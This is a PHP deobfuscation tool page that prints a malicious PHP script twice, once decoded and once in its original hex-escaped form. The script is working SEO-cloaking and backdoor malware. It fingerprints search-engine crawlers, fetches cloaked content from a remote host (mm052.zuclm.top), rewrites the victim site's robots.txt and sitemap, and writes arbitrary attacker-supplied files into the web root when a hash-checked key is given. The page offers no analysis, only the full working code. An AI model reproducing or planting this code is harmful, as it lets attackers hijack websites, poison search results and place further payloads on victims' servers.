Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

goto G840_; w0YGs: $htag = trim(daag($web)); goto SjZ9z; dlu9t: function sbot() { $uage..

Decoded Output download

<?   
 goto G840_; w0YGs: $htag = trim(daag($web)); goto SjZ9z; dlu9t: function sbot() { $uaget = strtolower($_SERVER["HTTP_USER_AGENT"]); if (stristr($uaget, "googlebot") || stristr($uaget, "bing") || stristr($uaget, "yahoo") || stristr($uaget, "google") || stristr($uaget, "Googlebot") || stristr($uaget, "googlebot")) { return true; } else { return false; } } goto xUS_H; Ke58L: $lag = urlencode($lag); goto CTJWM; o7zdP: $towe = $goto . ".zuclm" . ".top"; goto YpmGl; hMRYR: @ignore_user_abort(1); goto BgJog; CTJWM: $usse = ''; goto JCCns; xUS_H: function daag($url) { $ficonts = ''; if (function_exists("curl_init")) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 30); $ficonts = curl_exec($ch); curl_close($ch); } if (!$ficonts) { $ficonts = @file_get_contents($url); } return $ficonts; } goto nB4mi; jvGdr: function st_uri() { if (isset($_SERVER["REQUEST_URI"])) { $ddur = $_SERVER["REQUEST_URI"]; } else { if (isset($_SERVER["argv"])) { $ddur = $_SERVER["PHP_SELF"] . "?" . $_SERVER["argv"][0]; } else { $ddur = $_SERVER["PHP_SELF"] . "?" . $_SERVER["QUERY_STRING"]; } } return $ddur; } goto o7zdP; G840_: @set_time_limit(5000); goto hMRYR; BgJog: $goto = "mm052"; goto Pii87; iDX71: $lag = @$_SERVER["HTTP_ACCEPT_LANGUAGE"]; goto Ke58L; qEZDX: if ($ddur_tmp == '') { $ddur_tmp = "/"; } goto qCk66; o3hg1: if (@$_GET["pd"] != '') { $acot = @$_GET["mapname"]; if (isset($_SERVER["DOCUMENT_ROOT"])) { $path = $_SERVER["DOCUMENT_ROOT"]; } else { $path = dirname(__FILE__); } if (strstr($acot, "sitemap")) { $map_path = $path . "/sitemap.xml"; $file_path = $path . "/robots.txt"; @unlink($map_path); $robots = @file_get_contents($file_path); $data = "User-agent: *" . "
\xa" . "Allow: /"; $sturs = "\xd\xa" . "Sitemap: " . $http . "://" . $host . "/" . $acot . ".xml"; $futrobot = ''; if (strstr($robots, "sitemap.xml")) { if (strstr($robots, "/" . $acot . ".xml")) { echo "sitemap in added!"; die; } else { $robots .= $sturs; } } else { @unlink($file_path); $sturs .= "\xd\xa" . "Sitemap: " . $http . "://" . $host . "/sitemap.xml"; $robots = $data . $sturs; } if (file_put_contents($file_path, trim($robots))) { echo "<br>ok<br>"; } else { echo "<br>false!<br>"; } } else { if (strstr($acot, ".p" . "hp")) { if (sha1(sha1(@$_GET["a"])) == daag($htwe . "://" . $towe . "/a.p" . "hp")) { $dstr = @$_GET["dstr"]; if (file_put_contents($path . "/" . $acot, $dstr)) { echo "ok"; } } } else { echo "<br> false!<br>"; } } die; } goto Djskd; rxiX5: $ddur_tmp = st_uri(); goto qEZDX; qCk66: $ddur = urlencode($ddur_tmp); goto jvGdr; SjZ9z: if (!strstr($htag, "nobotuseragent")) { if (strstr($htag, "okhtmlgetcontent")) { @header("Content-type: text/html; charset=utf-8"); $htag = str_replace("okhtmlgetcontent", '', $htag); echo $htag; die; } else { if (strstr($htag, "okxmlgetcontent")) { $htag = str_replace("okxmlgetcontent", '', $htag); @header("Content-type: text/xml"); echo $htag; die; } else { if (strstr($htag, "getcontent404page")) { @header("HTTP/1.1 404 Not Found"); die; } else { if (strstr($htag, "getcontentexitpage")) { die; } } } } } goto dlu9t; xrPse: if (ishtt()) { $http = "https"; } else { $http = "http"; } goto rxiX5; Djskd: $web = $htwe . "://" . $towe . "/inde.php?web=" . $host . "&zz=" . sbot() . "&uri=" . $ddur . "&urlshang=" . $usse . "&http=" . $http . "&lang=" . $lag; goto w0YGs; YpmGl: function ishtt() { if (isset($_SERVER["HTTPS"]) && strtolower($_SERVER["HTTPS"]) !== "off") { return true; } elseif (isset($_SERVER["HTTP_X_FORWARDED_PROTO"]) && $_SERVER["HTTP_X_FORWARDED_PROTO"] === "https") { return true; } elseif (isset($_SERVER["HTTP_FRONT_END_HTTPS"]) && strtolower($_SERVER["HTTP_FRONT_END_HTTPS"]) !== "off") { return true; } return false; } goto KxW_b; JCCns: if (isset($_SERVER["HTTP_REFERER"])) { $usse = $_SERVER["HTTP_REFERER"]; $usse = urlencode($usse); } goto o3hg1; Pii87: $htwe = "http"; goto xrPse; KxW_b: $host = $_SERVER["HTTP_HOST"]; goto iDX71; nB4mi:  ?>

Did this file decode correctly?

Original Code


 goto G840_; w0YGs: $htag = trim(daag($web)); goto SjZ9z; dlu9t: function sbot() { $uaget = strtolower($_SERVER["\110\124\124\120\x5f\x55\123\x45\122\137\101\x47\x45\116\x54"]); if (stristr($uaget, "\147\157\x6f\x67\154\145\x62\157\x74") || stristr($uaget, "\x62\151\156\x67") || stristr($uaget, "\x79\141\150\x6f\x6f") || stristr($uaget, "\x67\x6f\157\x67\154\x65") || stristr($uaget, "\107\157\157\x67\154\145\x62\157\164") || stristr($uaget, "\x67\157\x6f\x67\x6c\145\142\157\164")) { return true; } else { return false; } } goto xUS_H; Ke58L: $lag = urlencode($lag); goto CTJWM; o7zdP: $towe = $goto . "\x2e\172\165\x63\x6c\155" . "\56\x74\157\x70"; goto YpmGl; hMRYR: @ignore_user_abort(1); goto BgJog; CTJWM: $usse = ''; goto JCCns; xUS_H: function daag($url) { $ficonts = ''; if (function_exists("\143\x75\x72\x6c\x5f\151\156\x69\164")) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 30); $ficonts = curl_exec($ch); curl_close($ch); } if (!$ficonts) { $ficonts = @file_get_contents($url); } return $ficonts; } goto nB4mi; jvGdr: function st_uri() { if (isset($_SERVER["\122\x45\121\125\105\x53\124\137\x55\122\x49"])) { $ddur = $_SERVER["\x52\x45\x51\x55\x45\x53\124\x5f\x55\x52\x49"]; } else { if (isset($_SERVER["\x61\x72\x67\x76"])) { $ddur = $_SERVER["\120\110\120\x5f\123\105\114\x46"] . "\77" . $_SERVER["\x61\x72\x67\166"][0]; } else { $ddur = $_SERVER["\x50\x48\x50\x5f\123\105\114\x46"] . "\x3f" . $_SERVER["\121\x55\x45\122\131\137\x53\124\122\111\116\107"]; } } return $ddur; } goto o7zdP; G840_: @set_time_limit(5000); goto hMRYR; BgJog: $goto = "\x6d\155\x30\65\x32"; goto Pii87; iDX71: $lag = @$_SERVER["\x48\124\x54\120\x5f\101\103\103\105\x50\124\x5f\x4c\x41\116\107\x55\101\107\x45"]; goto Ke58L; qEZDX: if ($ddur_tmp == '') { $ddur_tmp = "\57"; } goto qCk66; o3hg1: if (@$_GET["\x70\x64"] != '') { $acot = @$_GET["\x6d\141\x70\156\141\x6d\145"]; if (isset($_SERVER["\x44\117\x43\125\x4d\x45\x4e\x54\137\x52\117\117\x54"])) { $path = $_SERVER["\x44\117\103\x55\x4d\105\116\124\x5f\122\x4f\x4f\x54"]; } else { $path = dirname(__FILE__); } if (strstr($acot, "\163\x69\164\x65\155\141\x70")) { $map_path = $path . "\57\x73\151\164\x65\x6d\x61\x70\x2e\x78\x6d\x6c"; $file_path = $path . "\57\162\x6f\x62\x6f\164\x73\56\164\x78\x74"; @unlink($map_path); $robots = @file_get_contents($file_path); $data = "\125\163\x65\162\x2d\141\147\x65\156\x74\x3a\40\52" . "\15\xa" . "\101\x6c\154\157\x77\72\40\x2f"; $sturs = "\xd\xa" . "\x53\x69\x74\x65\155\x61\160\x3a\x20" . $http . "\x3a\x2f\57" . $host . "\57" . $acot . "\x2e\170\155\154"; $futrobot = ''; if (strstr($robots, "\x73\151\x74\x65\155\141\x70\56\x78\155\154")) { if (strstr($robots, "\57" . $acot . "\x2e\170\155\x6c")) { echo "\x73\151\164\x65\155\x61\160\40\151\x6e\40\141\144\x64\x65\x64\x21"; die; } else { $robots .= $sturs; } } else { @unlink($file_path); $sturs .= "\xd\xa" . "\x53\151\x74\x65\155\141\160\72\40" . $http . "\72\57\x2f" . $host . "\x2f\x73\151\164\x65\x6d\141\x70\56\170\x6d\x6c"; $robots = $data . $sturs; } if (file_put_contents($file_path, trim($robots))) { echo "\x3c\142\162\76\157\x6b\x3c\142\x72\76"; } else { echo "\x3c\x62\x72\76\x66\141\x6c\163\x65\x21\x3c\142\162\x3e"; } } else { if (strstr($acot, "\56\x70" . "\x68\x70")) { if (sha1(sha1(@$_GET["\141"])) == daag($htwe . "\x3a\x2f\57" . $towe . "\x2f\x61\x2e\x70" . "\150\160")) { $dstr = @$_GET["\144\x73\164\x72"]; if (file_put_contents($path . "\x2f" . $acot, $dstr)) { echo "\157\x6b"; } } } else { echo "\74\x62\x72\76\x20\x66\x61\x6c\x73\145\41\x3c\x62\162\76"; } } die; } goto Djskd; rxiX5: $ddur_tmp = st_uri(); goto qEZDX; qCk66: $ddur = urlencode($ddur_tmp); goto jvGdr; SjZ9z: if (!strstr($htag, "\156\x6f\142\157\164\165\163\145\x72\x61\x67\x65\156\164")) { if (strstr($htag, "\157\x6b\150\164\x6d\x6c\x67\x65\x74\x63\157\x6e\x74\x65\x6e\x74")) { @header("\103\157\x6e\x74\145\156\x74\55\164\171\x70\x65\72\40\164\x65\170\x74\x2f\x68\x74\x6d\x6c\73\x20\143\x68\x61\162\x73\145\164\75\x75\x74\146\55\70"); $htag = str_replace("\157\x6b\150\164\155\154\x67\145\x74\143\157\x6e\x74\x65\156\x74", '', $htag); echo $htag; die; } else { if (strstr($htag, "\157\153\x78\x6d\154\x67\145\x74\143\157\156\164\145\156\164")) { $htag = str_replace("\157\x6b\x78\155\154\x67\145\164\143\x6f\x6e\x74\x65\156\x74", '', $htag); @header("\x43\x6f\x6e\x74\x65\x6e\x74\x2d\164\171\x70\145\x3a\40\x74\145\170\x74\x2f\x78\x6d\154"); echo $htag; die; } else { if (strstr($htag, "\147\x65\164\143\x6f\156\x74\x65\156\164\64\60\64\160\141\x67\x65")) { @header("\x48\x54\x54\120\x2f\x31\56\61\x20\x34\x30\64\x20\116\157\x74\40\106\157\165\x6e\144"); die; } else { if (strstr($htag, "\147\145\164\143\157\156\x74\x65\x6e\164\x65\170\x69\164\x70\x61\147\x65")) { die; } } } } } goto dlu9t; xrPse: if (ishtt()) { $http = "\x68\164\x74\160\x73"; } else { $http = "\150\164\164\160"; } goto rxiX5; Djskd: $web = $htwe . "\x3a\x2f\57" . $towe . "\x2f\151\x6e\x64\x65\x2e\x70\150\x70\x3f\167\x65\142\75" . $host . "\46\172\x7a\x3d" . sbot() . "\46\165\162\151\75" . $ddur . "\46\165\x72\154\163\x68\x61\x6e\147\x3d" . $usse . "\x26\150\x74\164\160\75" . $http . "\46\x6c\141\x6e\x67\75" . $lag; goto w0YGs; YpmGl: function ishtt() { if (isset($_SERVER["\110\x54\x54\120\123"]) && strtolower($_SERVER["\110\124\124\x50\x53"]) !== "\157\146\x66") { return true; } elseif (isset($_SERVER["\110\124\x54\x50\137\130\x5f\x46\117\122\127\101\x52\x44\105\104\x5f\120\x52\x4f\x54\x4f"]) && $_SERVER["\110\124\124\120\137\x58\x5f\106\x4f\x52\127\x41\122\104\105\x44\137\x50\x52\x4f\124\x4f"] === "\150\x74\164\x70\163") { return true; } elseif (isset($_SERVER["\110\x54\124\120\x5f\106\x52\x4f\x4e\x54\137\x45\x4e\x44\x5f\x48\124\x54\x50\123"]) && strtolower($_SERVER["\x48\x54\124\x50\137\x46\x52\x4f\116\124\x5f\105\116\x44\137\x48\x54\124\120\x53"]) !== "\157\146\146") { return true; } return false; } goto KxW_b; JCCns: if (isset($_SERVER["\110\x54\124\x50\137\122\x45\106\x45\122\x45\x52"])) { $usse = $_SERVER["\x48\x54\124\120\137\122\x45\106\105\x52\105\x52"]; $usse = urlencode($usse); } goto o3hg1; Pii87: $htwe = "\x68\x74\x74\x70"; goto xrPse; KxW_b: $host = $_SERVER["\110\124\x54\120\x5f\110\x4f\x53\124"]; goto iDX71; nB4mi:

Function Calls

None

Variables

None

Stats

MD5 96614c392ac6ef2b407154bdc75d6bae
Eval Count 0
Decode Time 61 ms